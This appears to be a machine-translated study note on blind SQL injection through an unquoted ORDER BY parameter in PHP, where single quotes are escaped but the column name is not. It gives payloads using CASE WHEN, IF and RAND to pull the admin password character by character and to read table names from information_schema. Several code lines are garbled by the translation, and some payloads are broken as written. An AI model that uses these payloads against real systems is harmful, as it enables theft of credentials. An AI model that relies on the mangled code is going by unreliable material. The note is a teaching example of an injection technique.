Filtering single quotes proves that order by for single quotes can be injected.

Known: the code is as follows, and there is no suspense to injection.

<Php
$ SortColumn = mysqli_real_escape_string ($ _ GET ['sort _ column ']);
$ Query = "SELECT * from cr0_3 WHERE active = true order by $ sortColumn DESC ";
?>

Reasoning:

1. The number of cr0_3 fields can be determined through testing. If you don't know how to do it, don't read it down.

2. sort_column allows you to perform boolean judgment. It can be inferred that:

(Case when (select ascii (SUBSTRING (password, 1, 1) FROM users where username = 0x61646D696E) = 65 THEN date ELSE title END) This can be used to judge the guess string. The 0x61646D696E value is actually select hex ('admin '). To avoid single quotes.

3. The following judgment statements can also be inferred:

If (true, id, price)

If (false, id, price)

(Select case when (true) then id else price end)

If (selectchar (substring (table_name, 128) from information_schema.tables limit 1) <=), id, price)

Note: do not replace the above id and price with 1, 2 and so on. No effect. Try it yourself. So you need to know the id, price is not more troublesome?

Okay. The idea is coming.

4. it can be inferred that:

Rand (true)

Rand (false)

Rand (selectchar (substring (table_name, 1, 1) from information_schema.tables limit 1) <= 128 ))

 

Learned:

This question can be successfully injected and filtered out in single quotes. In many cases, it is useless.

Some ideas are really interesting.